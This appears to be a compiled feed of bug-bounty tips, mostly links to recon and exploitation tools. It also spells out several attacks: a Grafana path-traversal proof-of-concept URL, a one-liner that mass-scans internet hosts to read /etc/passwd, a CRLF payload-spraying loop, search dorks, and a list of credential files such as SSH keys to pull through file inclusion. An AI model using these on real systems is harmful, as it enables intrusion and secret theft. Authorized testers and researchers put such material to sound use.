Webapp Wordlists

This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

https://github.com/p0dalirius/webapp-wordlists

#wordlist #cms #bugbounty

KeyHacks

Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.

https://github.com/streaak/keyhacks

#api #key #check #bugbounty

Grafana — Unauthorized Arbitrary Read File

The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+

Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini

The "plugin-id" could be any plugin that exists in the system

One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest

ipsourcebypass

This Python script can be used to bypass IP source restrictions using HTTP headers.

https://github.com/p0dalirius/ipsourcebypass

#ip #header #bypass #bugbounty

log4hshell — Quick Guide

https://musana.net/2021/12/13/log4shell-Quick-Guide/

#log4j #waf #bypass #bugbounty

Bug Bounty Tip — Log4j Vulnerability Cheatsheet

— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)

#log4j #cheatsheet #bugbounty

Osmedeus

Fully automated offensive security framework for reconnaissance and vulnerability scanning

Features
— Subdomain Scan.
— Subdomain TakeOver Scan.
— Screenshot the target.
— Basic recon like Whois, Dig info.
— Web Technology detection.
— IP Discovery.
— CORS Scan.
— SSL Scan.
— Wayback Machine Discovery.
— URL Discovery.
— Headers Scan.
— Port Scan.
— Vulnerable Scan.
— Seperate workspaces to store all scan output and details logging.
— REST API.
— React Web UI.
— Support Continuous Scan.
— Slack notifications.
— Easily view report from commnad line.

https://github.com/j3ssie/Osmedeus

#osint #vulnerability #scanner #bugbounty

API Guesser

A simple website to guess API Key / OAuth Token

When you do pentest / Github recon and find API key / OAuth token but you don't know what API key it is, you can use my website that I built from javascript

https://api-guesser.netlify.app

Source:
https://github.com/daffainfo/apiguesser-web

#api #token #osint #bugbounty

Finding Sensitive Files for BugBounty

— /proc/self/cwd/index.php
— /proc/self/cwd/main.py
— /etc/motd
— /proc/net/udp
— /proc/net/arp
— /proc/self/environ
— /var/run/secrets/kubernetes.io/serviceaccount
— /proc/cmdline
— /proc/mounts
— /etc/motd
— /etc/mysql/my.cnf
— /proc/sched_debug
— /home/ user/.bash_history
— /home/user/.ssh/id_rsa

#sensitive #files #bugbounty #bugbountytips

Log4j — WAF and Patches Bypass Tricks

https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

#log4j #waf #bypass #bugbounty

CRLF OneLiner

A simple Bash one liner with aim to automate CRLF vulnerability scanning. This is an extremely helpful and practical One liner for Bug Hunters, which helps you find CRLF missconfiguration in every possible method. Simply replace the links in subdomains.txt with the URL you want to target. This will help you scan for CRLF vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CRLF.

Bash OneLiner:
input='CRLF-one-liner/subdomains.txt';while IFS= read -r targets; do cat CRLF-one-liner/crlf_payloads.txt |xargs -I % sh -c "curl -vs --max-time 9 $targets/% 2>&1 |grep -q '< Set-Cookie: ?crlf'&& echo $targets '[+] is vulnerable with payload: '%>>crlf_results.txt||echo '[-] Not vulnerable: '$targets";done<$input

crlf_payloads.txt:
https://raw.githubusercontent.com/kleiton0x00/CRLF-one-liner/master/crlf_payloads.txt

#crlf #bash #oneliner #bugbounty

LFIDump

A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.

https://github.com/p0dalirius/LFIDump

#lfi #dump #tools #bugbounty

Google Groups Dork

Some Devs use "Google Groups" as a workplace because it is easy and free.
But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc .

Dork:
site:http://groups.google.com "COMPANY"

#osint #dorks #bugbounty

The Bug Hunter Methodology

PDF:
https://www.ceos3c.com/wp-content/uploads/2020/06/Bug-Hunter-Methodology-V4-Visualization.pdf

#bugbounty #methodology #xmind

Wordlists

Dictionaries of attack patterns and primitives for black-box application fault injection and resource discovery.

https://github.com/fuzzdb-project/fuzzdb
https://github.com/Karanxa/Bug-Bounty-Wordlists
https://github.com/orwagodfather/WordList
https://wordlists.assetnote.io/

#wordlist #fuzzing #bugbounty

🤖 BBOT: OSINT automation for hackers

This tools is capable of executing the entire OSINT process in a single command, including subdomain enumeration, port scanning, web screenshots (with its gowitness module), vulnerability scanning (with nuclei), and much more. BBOT currently has over 50 modules and counting.

Features:
— Recursive;
— Graphing;
— Modular;
— Multi-Target;
— Automatic Dependencies;
— Smart Dictionary Attacks;
— Scope Distance;
— Easily Configurable via YAML.

Blog:
https://blog.blacklanternsecurity.com/p/bbot

Source:
https://github.com/blacklanternsecurity/bbot

#external #recon #osint #redteam #bugbounty

😈 [ pdiscoveryio, ProjectDiscovery.io ]

The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris

https://t.co/2GY3QZlTft

#hackwithautomation #cybersecurity #infosec #bugbounty

🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/

🐥 [ tweet ]

⚔️ Katana — Web Crawler

A next-generation crawling and spidering framework.

Features:
— Standard/Headless
— Customizable Config
— JavaScript parsing
— Scope control

https://github.com/projectdiscovery/katana

#web #crawler #tools #bugbounty

😈 [ 0x0SojalSec, Md Ismail Šojal ]

The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
get more detail about this👇

🔗 https://gist.github.com/0xSojalSec/5bee09c7035985ddc13fddb16f191075

#bugbountyTips #bugbounty

🐥 [ tweet ]

⚙️ Subdomain Generator

If you want to create subdomains quickly, try this site.

🔗 Source:
https://husseinphp.github.io/subdomain/

#subdomain #generator #bugbounty #web